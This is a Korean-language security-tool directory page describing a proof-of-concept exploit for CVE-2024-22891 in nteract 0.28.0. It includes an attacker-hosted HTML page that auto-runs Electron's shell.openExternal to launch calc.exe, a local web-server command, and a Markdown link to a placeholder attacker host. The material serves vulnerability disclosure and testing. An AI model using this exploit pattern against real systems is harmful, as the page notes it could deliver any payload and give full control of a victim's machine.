Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-22891 — nteract 0.28.0 open redirect을 통한 RCE 익스플로잇 | Kitploit
도구/GitHubGitHub/eqstlab/cve-2024-22891
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubeqstlab/cve-2024-22891

CVE-2024-22891

nteract 0.28.0 open redirect을 통한 RCE 익스플로잇

저장소 보기
2년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Nteract PoC

CVE-2024-22891 취약점에 대한 개념 증명(PoC)입니다.

nteract 0.28.0은 Markdown 링크를 통한 Electron webview를 허용하며, 그 결과 원격 코드 실행이 발생합니다.

이 저장소에는 취약한 예제 애플리케이션과 이에 대한 개념 증명(PoC) 익스플로잇이 포함되어 있습니다. PoC로 프로세스를 자동화하는 파이썬 파일이 있습니다.

1. 취약점 개요:

  • 취약점 대상: Markdown 링크 RCE
  • 취약점 유형: 기타: 오픈 리다이렉트(Open Redirect)
  • 문제 발현 형태: Electron Webview
  • 영향을 받는 구성 요소: markdown
  • 공격 유형: 원격 코드 실행(Remote Code Execution)
  • 공격 벡터: 취약점을 악용하려면 누군가가 링크를 클릭하거나 공유된 프로젝트의 링크에 접근해야 합니다.
  • 예약된 CVE 번호: CVE-2024-22891

2. 취약점 원인:

  • nteract 0.28.0은 Markdown 링크를 통한 Electron webview를 허용하며, 그 결과 원격 코드 실행이 발생합니다(webPreferences의 nodeIntegration이 true이기 때문).

  • 익스플로잇 설명

    • 애플리케이션 내에서 Markdown을 통해 링크를 생성하면 Electron을 통해 WebView가 생성되어 외부에서 해당 링크에 접근할 수 있게 됩니다. 결과적으로 공격자는 공격자 서버로 연결되는 링크에 접속함으로써 원격 코드 실행(RCE)을 달성할 수 있습니다.

개념 증명(PoC)

단계 1) 공격자는 openExternal() 함수를 사용하여 calc.exe를 실행하기 위한 소스 코드로 서버를 만듭니다.

root@kitploit:~
<html>
<head>
    <title>jruru Link</title>
</head>
<body>
    <a id="jruruLink">jruru Link</a>

    <script>
         // Script function definition
        function openExternal() {
            try {
                const { shell } = require('electron');
                shell.openExternal('file:C:/Windows/System32/calc.exe');
            } catch(e) {
                alert('JRURU - External link cannot be opened.');
                console.error(e);
            }
        }
        // Automatically execute openExternal function after the page is loaded
        document.addEventListener('DOMContentLoaded', function() {
            openExternal();
        });
    </script>
</body>
</html>

참고: ※ 빠르게 테스트하고 싶다면 공격자 PC에서 다음 코드로 서버를 생성하세요.

root@kitploit:~
$ python -m http.server 80

단계 2) 피해자 시스템에서 nteract 애플리케이션을 실행하고 Markdown 링크를 생성하거나, 공격자의 ipynb 파일을 예제 코드로 공유합니다. 그러면 calc.exe가 실행됩니다.

root@kitploit:~
[Read This] (http://[attcker_adress]/shard_data.html)

neteract nteract2


3. 추가 정보

파일 공유를 통해 .ipynb 파일을 실행할 때 링크가 표시되지 않을 수 있으므로 주의하세요. 이 calc.exe는 로컬 또는 원격의 모든 악성 페이로드가 될 수 있었으며, 이를 통해 공격자는 피해자 시스템에 대한 완전한 접근 권한을 얻을 수 있었을 것입니다.

도구 다운로드